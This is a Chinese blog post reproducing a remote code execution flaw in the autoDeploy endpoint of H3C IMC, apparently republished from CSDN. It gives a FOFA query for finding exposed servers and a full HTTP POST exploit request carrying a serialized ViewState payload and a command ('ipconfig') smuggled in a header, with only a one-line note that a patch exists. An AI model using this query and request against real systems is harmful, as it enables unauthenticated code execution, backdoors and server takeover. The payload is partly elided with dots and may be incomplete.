首页 > 其他分享 >H3C-IMC智能管理中心RCE漏洞复现

H3C-IMC智能管理中心RCE漏洞复现

时间:2024-08-28 10:54:41浏览次数:13  
标签:H3C IMC ... .... Accept 漏洞 ..... autoDeploy RCE

0x01 漏洞描述:

autoDeploy接口中存在远程代码执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。

0x02 搜索语句:

Fofa:(title="用户自助服务" && body="/selfservice/javax.faces.resource/") || body="/selfservice/index.xhtml"

0x03 漏洞复现:

POST /imc/dc3dtopo/dc2dtopo/autoDeploy.xhtml;.png HTTP/1.1
Host:your-ip
User-Agent:Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/94.0.2558.72Safari/537.36
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Content-Type: application/x-www-form-urlencoded
Via: ipconfig
Content-Length: 2186

javax.faces.ViewState=8SzWaaoxnkq9php028NtXbT98DEcA...Uh57HB/L8xz6eq%2b4sy0rUOuOdM5ccd2J6LPx8c6%2b53QkrX...jpFKgVnp07bad4n6CCBW8l98QIKwByAhLYdU2VpB/voaa....2oU%2burahQDFE8mIaFvmwyKOHiwyovIHCVymqKwNdWXm3iHLhYEQXL4....k3z7MWm%2bwbV2Dc9TXV4rs8E6M7ZvVM3B0pORK8vAhd2iLBkgFhGHw9ZgOwifGnyMzfxlU....gG4chEOg57teuLurMPrulbEVBAEl7rRwobqvxb91sG%2bGMrGWFL5%2bwFvE56x7UEzHtE/o0IRtzTKi/EFnamrPT1046e7L8jABKDB/LjCX2qAOmqQkIz4gXrEFnHHYZ9LZc7t9ZZPNT...JZjummuZuror/zwPbnsApwXlYsn2hDAZ7QlOBunA3t7omeOTI5keWXvmOH8eoEEN//SlmQblwhBZ7kSHPvStq0ZciiPptEzVjQ/k/gU2QbCSc7yG0MFbhcJEDQj4yKyJ/yTnOOma....KuNzZl%2bPpEua%2b28h2YCKipVb5S/wOCrg%2bKD3DUFCbdWHQRqDaZyvYsc8C0X7fzutiVUlSB7OdGoCjub9WuW0d2eeDWZmOt3Wunms3SwAbE7R%2bonCRVS8tiYWF8qiQS%2bl0k8Gw/Hz6Njpfe0upLIAtPFNDuSf69qGg4isEmY2FtoSQTdD8vU0BdJatHrBArPgo9Qsp0jSJBlUz2OqteQg05PYO6gEBXVj/RiTBHI1/pOzlcE0wVZcLUHnxGNvckSCTiT....nWbkWGJ8AYCvrM0PHZ/BYcKKRf3rMHoIqcAN%2bORMhXcmAXRcvq29c5xqoOuvrMSJPDZmbZhcm/99crGJSO5HxXQder9WKm2tVBaDLEC9ulpWyICJYgfxayoWkt6vwPcq2Tn20vn5RDpfqJKLNLbrV8g7JDRUUyW%2b....R6PRNunKhfJHvHcXAZ73mkCUf7cMUbNhqCbLSGP/D%2bqpqWXk5ZWjsT4tQ9tFH9uvPIaNB7FlcFXI2I2A9oPoY0ltif%2bb8BdPXVfpuZq8boHE4hY%2b33BIl%2bIa%2bov6nyMmGIzCKYeRbfDJtk/45EXvink6BIgA/205la6vvqKTGQ32o1AtepBgKei....604cVvbEP7UKor09Gz61mryE4D%2biXG1prZGCT3LEtdASuCkmf4RTEc5wks2In3ElZSZl8zf3RsHA0dgbvrpnXe2wLPI%2bUCAGO%2biOG9/%2bbCQJQNFmykkyRbmslfcilUxZ%2bIg%2bQuOs9FlMod2ICrkktOFFeZWNeznx737S8H4Nf2%2bp2QNHY2I6GFGtWpqjeZ%2bGmb1euM5Tzi06eJ.......koPrjkDT9VPoxCgpRMQl06x7NShkos7BCI9fV1%2b17t5gWZvqAYzeQUsZLaiBXaZfuUtPuBmbq1re/dB/VgSOn4QX%2b8AwwDjtfazsHw4aIdh4e2a1y/Ou2ZiI//EzkwIBksY6CluuPgocdvtOfNiWcXsfYs3UKLmL/48A4Ls0OF1TrQK4UnfCYt.....1DGrwzfXnM9vLHznFaJenqvLY3yTiKN5SSVxvGwvhmp6PFW4Jj7G8NXdr/zN7HyC9Eg1Y1jKP7uiO%2bGM2U/etvMOCKwnfP2MnbznP378fZHf1H9yiVVrn%2bm%2b0u8PV.....2MsOTgS6B7C8ItflgSfJz5dkJ8IssRAcY%2bu/2QjrW95BBMSRPu2EaCUm1IpuszXEwHYgDizWPzDB0hSRgCEjncpGhPX3i10bK4/snBaBcAxAa1e2er2LDe/4WgaIwc9w2wKn3wXY5B87BKF5/Xq30....NNf6EMRrQ9154rEkCJb4IU4sFsTuyYlfZatlV%2bC2HM7u7FEbdVvr6yYK4oQqvfPmF5yRplwAYUQAvr1jwLbGYxhGaTy14UUrtvoyph5Sqebk2YTKjKX4U7xX5ha4YbyoVIMSRzdvB6YXDY3BId%2bgmMWZtTf2UE%2b9UAx/7g30pQNXA....FP1adq6ySd4x3dGVCe4YJcYe2gKWYVcWj5XPwUSt2fxdshzgFnjjqmRgxowH2u2nZU0xG539lnxIOlB

0x04 修复建议:

厂商已更新补丁,请即时进行处理

标签:H3C,IMC,...,....,Accept,漏洞,.....,autoDeploy,RCE
From: https://blog.csdn.net/xc_214/article/details/141633565

相关文章

  • Codeforces Round 968 (Div. 2)
    题目链接:CodeforcesRound968(Div.2)-Codeforces总结:C题想到了,但是写成shi了,出得有点慢。A.TurtleandGoodStringtag:签到Solution:直接判断第一个字符是否与最后一个字符相等即可。voidsolve(){cin>>n;strings;cin>>s;if(s[0]==s[n-1]......
  • Codeforces Round 968 (Div. 2)
    题目链接:CodeforcesRound968(Div.2)-Codeforces总结:C题想到了,但是写成shi了,出得有点慢。A.TurtleandGoodStringtag:签到Solution:直接判断第一个字符是否与最后一个字符相等即可。voidsolve(){cin>>n;strings;cin>>s;if(s[0]==s[......
  • Codeforces Round 967 (Div. 2)
    题目链接:CodeforcesRound967(Div.2)-Codeforces总结:B题没测试就交wa一发,C题一直没想到怎么回溯,哎。A.MakeAllEqualtag:签到Solution:找到相同元素的最大值,将其它所有元素删去。voidsolve(){cin>>n;vector<int>a(n);map<int,int>mp;intans......
  • Codeforces Round 962 (Div. 3)
    A.Legs若只判断题,根据模4意义下分类即可。B.Scale模拟题,缩小同值矩阵即可。C.Sort对每个字母求前缀数量和,答案就是两端点的差。constintN=2e5+5;intT,n,q;chara[N],b[N];intc[N][26],d[N][26];signedmain(void){ for(read(T);T;T--){ read(......
  • [Spring]@Autowired 和 @Resource
    注入Bean的注解有哪些?Spring内置的@Autowired以及JDK内置的@Resource和@Inject都可以用于注入Bean。AnnotationPackageSource@Autowiredorg.springframework.bean.factorySpring2.5+@[email protected]......
  • neovim 安装插件,并配置vimconig
    neovim安装插件,并配置vimconig1.neovim安装参考这里2.插件包管理器安装Vundle是vim的一个插件管理器,同时它本身也是vim的一个插件。插件管理器用于方便、快速的安装、删除、Vim更新插件。vimVundle插件官方地址:https://github.com/VundleVim/Vundle.vim下载Vundle插件......
  • Codeforces Round 968 (Div. 2)
    A.TurtleandGoodStrings题意:确定是否存在一种方案使得\(s=t_1+t_2+\cdots+t_m\),满足\(m>1\)且任意\(i<j\),\(t_i\)的第一个字母不等于\(t_j\)的最后一个字母。\(s_1\)和\(s_n\)一定不属于一个子串,因此\(s_1\nes_n\)是条件非法的必要条件。那么反......
  • 论文解读Multi-Prompt Alignment for Multi-Source Unsupervised Domain Adaptation
    Multi-PromptAlignmentforMulti-SourceUnsupervisedDomainAdaptationNeurlIPS2023摘要大多数现有的无监督域适应(UDA)方法依赖于共享网络来提取领域不变特征。无论如何,当面对多个源域时,优化这样的网络涉及更新整个网络的参数,这样既昂贵又有挑战性,特别是与最小最大......
  • [Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+TeamViewer权限提升
    信息收集IPAddressOpeningPorts10.10.10.180TCP:21,80,111,135,139,445,2049,5985,47001,49664,49665,49666,49667,49678,49679,49680nmap-p-10.10.10.180--min-rate1000-sC-sVPORTSTATESERVICEVERSION21/tcpopenftp......
  • x86 ubuntu20.04 ros:noetic-perception-focal 镜像测试
    https://hub.docker.com/_/ros/tags?page=&page_size=&ordering=&name=noetic1.启动容器:dockerpullros:noetic-perception-focaldockerrun-it--envDISPLAY=$DISPLAY--volume/tmp/.X11-unix:/tmp/.X11-unix--privileged--gpusall--volume/home/h/doc......